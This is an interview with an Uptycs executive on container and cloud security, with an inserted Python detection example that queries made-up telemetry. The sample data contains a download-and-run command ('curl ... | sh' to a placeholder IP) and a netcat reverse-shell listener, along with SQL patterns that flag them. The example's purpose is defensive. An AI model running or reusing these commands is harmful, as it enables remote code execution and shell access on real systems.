The security challenges of widespread container use [Q&A]
Containers have provided greater flexibility and enabled developers to think less about their infrastructure. However, securing them presents a challenge.
Traditional workload protection technologies designed for static workloads don't work well on minimized, ephemeral container workloads. There's also increased use of open source software that presents additional risks.
We spoke to Ganesh Pai, CEO of SQL-based security analytics platform Uptycs, to find out more about these issues and how DevSecOps teams can deal with them.
BN: The cloud-native application stack has exploded in size, what challenges does that present for security teams?
GP: Visibility, unity, and hiring for the right skills. Cloud-native security technology is moving extremely fast, just like cloud-native technologies. As DevOps practitioners adopt newer approaches, security teams need to maintain and increase visibility in order to keep up.
The number of endpoints an enterprise oversees has leapt thanks to new ways of running workloads, such as containers and microservices. It's critical for companies to be able to monitor and observe activity across their AWS, Azure, and other services to assess potential threats across their environments.
There's one problem though: how can security analysts get host-based data from ephemeral workloads that don’t support traditional endpoint instrumentation?
I also mentioned hiring because there is a glaring shortage of security experts who understand complex cloud and container environments. That's just one of the reasons we're busy building Uptycs Academy, to do our part in helping to close that gap.
BN: This growth in the number of applications has weakened company perimeters and widened the attack surface significantly. What can be done to fortify it?
GP: It's key to address fragmentation; the average enterprise has about 45 security tools -- many have over 100 -- and more is not better when they are point solutions that collect overlapping data from the same endpoints, store the data separately and then use proprietary analytics to create siloed reports and alerts. Moreover, on any given day, many cloud services are not securely configured, leaving doors open for attackers.
We see that a major step toward stronger security posture is collecting a wide range of system data -- for end-to-end security visibility at large scale -- and then generating analytics that can be applied to many kinds of IT and cybersecurity challenges. To enable that, we built a SaaS SQL-powered security analytics platform to observe and secure a wide range of productivity endpoints (macOS, Windows), server endpoints (Linux, containers) and cloud providers. Large enterprises have deployed this platform for fleet visibility, intrusion detection, vulnerability management, audit, and compliance for their laptops, servers, and cloud workloads.
BN: Ransomware has become a major threat in recent times, what can companies do to guard against it?
GP: Being proactive is a good start and probably the single most important piece of advice. To fight ransomware and data theft, being reactive is definitely not a good approach. Being proactive means using all telemetry to, for example, sound the alarm on misconfigurations and meaningful vulnerabilities so that they can be remediated before ransomware becomes a problem.
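The two ideas above, collecting system data from hosts, containers and cloud providers into one SQL-queryable store (the previous answer) and then using that telemetry proactively to flag meaningful misconfigurations before an attacker does (this answer), as an added worked example. This is not Uptycs code and not from the original page; the table schemas, the constructed process events and cloud configuration records, and the detection rules are all assumptions made for illustration. It loads the sample rows into SQLite and runs three queries: one host-side detection over container process events, and two configuration checks over cloud resources.

```python
import sqlite3

# Constructed sample telemetry for this example (not real data): process
# events from short-lived containers and one plain host, plus cloud
# configuration records. The schemas are assumptions, not any vendor's.
PROCESS_EVENTS = [
    # (host, container_id, pid, name, cmdline, uid, ts)
    ("node-a", "c1f3", 101, "nginx", "nginx -g 'daemon off;'", 0, 1000),
    ("node-a", "c1f3", 142, "sh", "sh -c 'curl http://203.0.113.7/x.sh | sh'", 0, 1010),
    ("node-a", "c1f3", 143, "curl", "curl http://203.0.113.7/x.sh", 0, 1010),
    ("node-b", "9a77", 201, "python3", "python3 app.py", 1000, 1005),
    ("node-b", "9a77", 250, "nc", "nc -l -p 4444 -e /bin/sh", 1000, 1020),
    ("node-c", "", 301, "sshd", "/usr/sbin/sshd -D", 0, 900),
]
SECURITY_GROUPS = [
    # (provider, group_id, port, cidr)
    ("aws", "sg-0abc", 22, "0.0.0.0/0"),
    ("aws", "sg-0abc", 443, "0.0.0.0/0"),
    ("aws", "sg-0def", 22, "10.0.0.0/8"),
    ("azure", "nsg-web", 3389, "0.0.0.0/0"),
]
STORAGE = [
    # (provider, bucket, public_read)
    ("aws", "bucket-logs", 1),
    ("azure", "stg-main", 0),
]


def build_db():
    """Load the constructed telemetry into an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE process_events(host, container_id, pid, name, cmdline, uid, ts);
        CREATE TABLE security_groups(provider, group_id, port, cidr);
        CREATE TABLE storage(provider, bucket, public_read);
    """)
    conn.executemany("INSERT INTO process_events VALUES (?,?,?,?,?,?,?)", PROCESS_EVENTS)
    conn.executemany("INSERT INTO security_groups VALUES (?,?,?,?)", SECURITY_GROUPS)
    conn.executemany("INSERT INTO storage VALUES (?,?,?)", STORAGE)
    conn.commit()
    return conn


def suspicious_container_processes(conn):
    """Host-side detection over container events: a shell that pipes a
    download straight into an interpreter (ATT&CK T1105 / T1059.004), or
    netcat started with -e to attach a shell to a socket. Processes with an
    empty container_id (the plain host) are deliberately out of scope here."""
    return conn.execute("""
        SELECT host, container_id, pid, name, cmdline
        FROM process_events
        WHERE container_id <> ''
          AND (
               (name IN ('sh', 'bash') AND cmdline LIKE '%curl%|%sh%')
            OR (name = 'nc' AND cmdline LIKE '%-e %')
          )
        ORDER BY ts
    """).fetchall()


def world_reachable_admin_ports(conn):
    """Misconfiguration check: SSH or RDP reachable from any address.
    Port 443 open to the world is not flagged; a public web tier needs it."""
    return conn.execute("""
        SELECT provider, group_id, port
        FROM security_groups
        WHERE cidr IN ('0.0.0.0/0', '::/0') AND port IN (22, 3389)
        ORDER BY provider, group_id
    """).fetchall()


def public_buckets(conn):
    """Misconfiguration check: object storage readable by anyone."""
    return conn.execute(
        "SELECT provider, bucket FROM storage WHERE public_read = 1"
    ).fetchall()


def report(conn):
    """One view over host and cloud findings, the way a single analytics
    layer lets a team review them together instead of in per-tool silos."""
    return {
        "container_processes": suspicious_container_processes(conn),
        "admin_ports": world_reachable_admin_ports(conn),
        "public_buckets": public_buckets(conn),
    }


if __name__ == "__main__":
    db = build_db()
    for category, rows in report(db).items():
        print(category)
        for row in rows:
            print("  ", row)
```

The point of keeping everything in one store is visible in `report()`: the same query language answers "what ran inside that container that no longer exists" and "which security group is exposing SSH to the internet", so the two findings can be correlated and prioritized together rather than read from separate consoles. In a real fleet the rows would come from an agent or API collector, and the detection rules would be tuned against far noisier data than these six events.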
BN: Security is a growing concern globally, so much so that governments are taking more and more action to improve cybersecurity in their respective countries. What does this say about the state of security generally?
GP: The Biden administration is making a concerted effort to repair a broken system. Every government and company can see we are all linked to one another, in a way that makes one organization vulnerable to the security shortcomings of another. Supply chain cybersecurity risk exposure is high for nearly everyone, including governments -- as the SolarWinds breach proved.
The Executive Order (EO) on Improving Cybersecurity is a significant step in the right direction. It pushes collaboration against cyberthreats, which is critical for effective cyber response, and mandates Zero Trust security models across federal agencies. The idea of ‘assuming compromise’ will increase threat vigilance with no more 'good-faith' trust in vendors. That will increase vendor transparency and help mitigate supply chain risk. Some of the specifics, like requiring a software bill-of-materials, are very encouraging.
BN: Lastly, the million-dollar question: will there ever be a time where the 'good guys' (i.e., government and the technology sector) can be a step ahead of bad actors?
GP: Yes. Some organizations are much further ahead today than others. I'll list some of the ingredients: you need maximum visibility into all your productivity endpoints, production endpoints and cloud providers. Build a singular view with unified security analytics that not only covers your cloud-native environments but also your traditional on-premises environments; your security teams will perform better. There are studies showing that fewer security tools result in a stronger security posture, so businesses should be skeptical of investing in yet another narrowly-focused tool. Get tools to separate the signal from the noise and focus on the detections and security gaps that are most likely to represent actual threats. You may have 100 alerts and 2,000 patches to apply, but which ones really matter right now?
It's also important to make the most of the MITRE ATT&CK framework to improve your ability to detect threats faster.
Look for opportunities to automate repetitive tasks, use orchestration to refine your workflows, and apply your most important asset -- your people -- in ways that best harness their intelligence and creativity. It’s not an either-or proposition. You don't replace security analysts with a machine-driven alternative; you complement them with automation and orchestration tools that enhance their capabilities -- and then you get the best performance from those tools. We are optimistic on your question -- getting ahead of the bad guys -- but realistic, because it's always a dynamic situation.